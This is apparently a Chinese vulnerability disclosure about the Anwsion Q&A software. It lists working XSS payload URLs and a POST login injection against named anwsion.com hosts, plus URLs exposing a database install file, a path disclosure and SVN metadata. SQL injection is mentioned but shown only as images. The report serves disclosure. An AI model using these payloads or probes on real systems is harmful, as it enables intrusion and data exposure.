anwsion漏洞小礼包二

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: 再忽略就泪奔了。 ### 详细说明: 1.XSS ``` http://wenda.anwsion.com/home/explore/category-3%22%3E%3Ciframe%20src=//www.baidu.com%3E http://wenda.anwsion.com/home/explore/page-5__sort_type-hot__category-3_%22%3E%3Ciframe%20onload=alert(/xss/)%3E-1 http://wenda.anwsion.com/search/q-MTwvdGl0bGU+MTxTY1JpUHQgPmFsZXJ0KC94c3MvKTwvU2NSaVB0Pg==#all http://dev.anwsion.com/?q="><iframe onload=alert(/xss/)> http://dev.anwsion.com/?act=login POST:password=password&referer="><iframe onload=alert(1)>&username=hehe ``` 2.数据库信息泄漏 http://dev.anwsion.com/sql/install/database.sql 3.路径泄漏 http://dev.anwsion.com/i/?act=getentry&page[]=1 4.SVN http://static.anwsion.com/.svn/entries http://static.anwsion.com/admin/.svn/entries 5.SQL注入(见图) ### 漏洞证明: [<img src="https://images.seebug.org/upload/201210/16214329a82c2de5f0fa7fb98781a2eaf1c1c5b2.jpg" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201210/16214329a82c2de5f0fa7fb98781a2eaf1c1c5b2.jpg) [<img...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息